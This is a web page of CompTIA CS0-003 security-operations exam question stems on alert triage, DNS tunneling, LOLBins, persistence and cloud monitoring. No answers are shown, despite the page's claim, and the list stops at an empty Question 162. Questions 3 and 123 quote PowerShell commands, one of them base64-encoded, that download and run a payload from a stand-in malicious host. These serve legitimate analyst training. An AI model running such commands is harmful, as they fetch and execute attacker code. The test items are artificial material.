
CS0-003 Security Operations • Complete Question Bank

CS0-003 Security Operations — All Questions With Answers

Complete CS0-003 Security Operations question bank — all 0 questions with answers and detailed explanations.

165 Questions • Free • No signup
Question 1 (easy, multiple choice)

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

Question 2 (medium, multiple choice)

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

Question 3 (hard, multiple choice)

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

Question 4 (medium, multiple choice)

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

Question 5 (easy, multiple choice)

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

Question 6 (medium, multiple choice)

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

Question 7 (hard, multiple choice)

During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?

Question 8 (medium, multiple choice)

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

Question 9 (easy, multiple choice)

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

Question 10 (medium, multiple choice)

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

Question 11 (hard, multiple choice)

An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?

Question 12 (medium, multiple choice)

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

Question 13 (medium, multi-select)

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

Question 14 (hard, multi-select)

A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)

Question 15 (medium, multi-select)

A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)

Question 16 (easy, multiple choice)

A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?

Question 17 (medium, multiple choice)

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

Question 18 (medium, multiple choice)

A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?

Question 19 (easy, multiple choice)

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

Question 20 (medium, multiple choice)

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?

Question 21 (hard, multiple choice)

An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?

Question 22 (medium, multiple choice)

A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?

Question 23 (easy, multiple choice)

Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?

Question 24 (medium, multiple choice)

A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?

Question 25 (hard, multiple choice)

During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?

Question 26 (medium, multiple choice)

A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?

Question 27 (hard, multiple choice)

An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?

Question 28 (medium, multi-select)

A security analyst is tuning a SIEM rule that generates alerts for any failed login attempt. The rule produces too many alerts, overwhelming the team. Which TWO actions would most effectively reduce false positives while maintaining detection of actual brute-force attacks?

Question 29 (medium, multi-select)

A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?

Question 30 (hard, multi-select)

An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?

Question 31 (easy, multiple choice)

A security analyst is reviewing a SIEM alert for a single failed login attempt from an internal IP address to a file server. The analyst determines this is a false positive. Which step should the analyst take next?

Question 32 (medium, multiple choice)

During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?

Question 33 (hard, multiple choice)

A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?

Question 34 (easy, multiple choice)

A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?

Question 35 (medium, multiple choice)

An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?

Question 36 (medium, multiple choice)

A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?

Question 37 (hard, multiple choice)

During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?

Question 38 (medium, multiple choice)

An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?

Question 39 (easy, multiple choice)

An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?

Question 40 (medium, multiple choice)

A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?

Question 41 (medium, multiple choice)

An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?

Question 42 (hard, multiple choice)

An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?

Question 43 (medium, multi-select)

A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)

Question 44 (hard, multi-select)

During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)

Question 45 (medium, multi-select)

An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)

Question 46 (easy, multiple choice)

A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?

Question 47 (medium, multiple choice)

During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?

Question 48 (hard, multiple choice)

A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?

Question 49 (medium, multiple choice)

A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?

Question 50 (easy, multiple choice)

Which of the following log sources would be most useful for detecting DNS tunneling?

Question 51 (medium, multiple choice)

A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?

Question 52 (hard, multiple choice)

A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?

Question 53 (medium, multiple choice)

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

Question 54 (easy, multiple choice)

A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?

Question 55 (medium, multiple choice)

During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?

Question 56 (hard, multiple choice)

An analyst is reviewing a memory dump from a compromised workstation and finds a process that appears to be a legitimate system process but has a different parent process and is running from a non-standard location. Which analysis technique is most appropriate?

Question 57 (medium, multiple choice)

A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?

Question 58 (medium, multi-select)

A security analyst is investigating a potential data exfiltration using DNS. Which TWO indicators are most consistent with DNS tunneling?

Question 59 (hard, multi-select)

A threat hunter is using osquery to look for persistence mechanisms on a set of Windows endpoints. Which THREE registry keys or scheduled tasks should the hunter check for common persistence?

Question 60 (easy, multi-select)

An analyst is configuring correlation rules in a SIEM. Which TWO data sources are essential for detecting lateral movement using pass-the-hash attacks?

Question 61 (medium, multiple choice)

A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?

Question 62 (hard, multiple choice)

During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?

Question 63 (easy, multiple choice)

A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?

Question 64 (medium, multiple choice)

An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?

Question 65 (medium, multiple choice)

A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?

Question 66 (easy, multiple choice)

Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?

Question 67 (medium, multiple choice)

A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?

Question 68 (medium, multiple choice)

An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?

Question 69 (hard, multiple choice)

During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?

Question 70 (medium, multiple choice)

An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?

Question 71 (easy, multiple choice)

Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?

Question 72 (hard, multiple choice)

An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?

Question 73 (medium, multi-select)

A security analyst is reviewing network traffic and suspects a host is infected with malware that uses a domain generation algorithm (DGA) for C2 communication. Which two of the following indicators are most consistent with DGA activity?

Question 74 (medium, multi-select)

During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?

Question 75 (hard, multi-select)

An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?

Question 76 (medium, multiple choice)

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?

Question 77 (easy, multiple choice)

A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?

Question 78 (medium, multiple choice)

During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?

Question 79 (hard, multiple choice)

A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?

Question 80 (easy, multiple choice)

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?

Question 81 (medium, multiple choice)

An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?

Question 82 (hard, multiple choice)

A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?

Question 83 (easy, multiple choice)

Which tool would best allow a security analyst to capture and analyze packets in real time to investigate a network anomaly?

Question 84 (medium, multiple choice)

A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?

Question 85 (medium, multiple choice)

During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?

Question 86 (hard, multiple choice)

An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?

Question 87 (medium, multiple choice)

A security analyst is configuring a vulnerability scanner for internal network scanning. The analyst wants to ensure the scanner can identify missing patches and software configurations that require administrative privileges to read. Which scan type should the analyst configure?

Question 88 (medium, multi-select)

A SOC analyst is investigating an alert from Azure Sentinel indicating a user account logged in from an unfamiliar location. The analyst wants to determine if this is a true positive. Which TWO additional log sources should the analyst correlate to make an informed decision?

Question 89 (hard, multi-select)

A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?

Question 90 (medium, multi-select)

An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?

Question 91 (medium, multiple choice)

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?

Question 92 (hard, multiple choice)

During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?

Question 93 (easy, multiple choice)

A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?

Question 94 (medium, multiple choice)

A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?

Question 95 (medium, multiple choice)

During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?

Question 96 (hard, multiple choice)

A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?

Question 97 (easy, multiple choice)

Which of the following is the best data source for detecting DNS tunneling activity?

Question 98 (medium, multiple choice)

A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?

Question 99 (hard, multiple choice)

An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?

Question 100 (easy, multiple choice)

What is the primary purpose of performing credentialed vulnerability scans?

Question 101 (medium, multiple choice)

A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?

Question 102 (medium, multiple choice)

During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?

Question 103 (medium, multi-select)

A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?

Question 104 (hard, multi-select)

During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?

Question 105 (easy, multi-select)

A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?

Question 106 (medium, multiple choice)

A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?

Question 107 (easy, multiple choice)

During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?

Question 108 (hard, multiple choice)

An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?

Question 109 (medium, multiple choice)

A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?

Question 110 (medium, multiple choice)

A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?

Question 111 (easy, multiple choice)

Which of the following is the primary purpose of log normalisation in a SIEM?

Question 112 (hard, multiple choice)

An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?

Question 113 (medium, multiple choice)

During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?

Question 114 (easy, multiple choice)

An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?

Question 115 (medium, multiple choice)

A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?

Question 116 (hard, multiple choice)

An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?

Question 117 (easy, multiple choice)

Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?

Question 118 (medium, multi-select)

A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?

Question 119 (hard, multi-select)

During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?

Question 120 (medium, multi-select)

A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?

Question 121 (easy, multiple choice)

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?

Question 122 (medium, multiple choice)

During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?

Question 123 (hard, multiple choice)

An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?

Question 124 (medium, multiple choice)

A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?

Question 125 (medium, multiple choice)

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?

Question 126 (easy, multiple choice)

A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?

Question 127 (medium, multiple choice)

A threat hunter is reviewing osquery data from endpoints and notices that the Windows Registry key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' contains an entry for 'C:\Users\Public\svchost.exe'. Which of the following best describes the significance of this finding?

Question 128 (hard, multiple choice)

A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?

Question 129 (easy, multiple choice)

An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?

Question 130 (medium, multiple choice)

A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?

Question 131 (medium, multiple choice)

During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?

Question 132 (hard, multiple choice)

A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?

Question 133 (medium, multi-select)

A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)

Question 134 (medium, multi-select)

A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)

Question 135 (hard, multi-select)

A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)

Question 136 (easy, multiple choice)

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?

Question 137 (easy, multiple choice)

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?

Question 138 (medium, multiple choice)

An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?

Question 139 (medium, multiple choice)

An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?

Question 140 (medium, multiple choice)

A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?

Question 141 (medium, multiple choice)

An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?

Question 142 (medium, multiple choice)

During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?

Question 143 (medium, multiple choice)

A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?

Question 144 (hard, multiple choice)

An analyst is reviewing a packet capture and notices a TCP connection with the following sequence: SYN, SYN-ACK, ACK, SYN, ACK. What does this pattern indicate?

Question 145 (hard, multiple choice)

A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?

Question 146 (hard, multiple choice)

An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?

Question 147 (easy, multiple choice)

A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?

Question 148 (medium, multi-select)

An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)

Question 149 (hard, multi-select)

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Question 150 (medium, multi-select)

An analyst is reviewing cloud audit logs from AWS CloudTrail and notices an API call to create an IAM user with administrative privileges from an IP address outside the corporate network. Which TWO actions should the analyst take first? (Select TWO.)

Question 151 (easy, multiple choice)

A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?

Question 152 (easy, multiple choice)

During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?

Question 153 (medium, multiple choice)

A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?

Question 154 (hard, multiple choice)

During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?

Question 155 (easy, multi-select)

A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?

Question 156 (easy, multi-select)

A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?

Question 157 (medium, multi-select)

During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?

Question 158 (medium, multi-select)

A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?

Question 159 (medium, multi-select)

A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?

Question 160 (medium, multi-select)

A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?

Question 161 (medium, multi-select)

A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?

Question 162 (hard, multi-select)

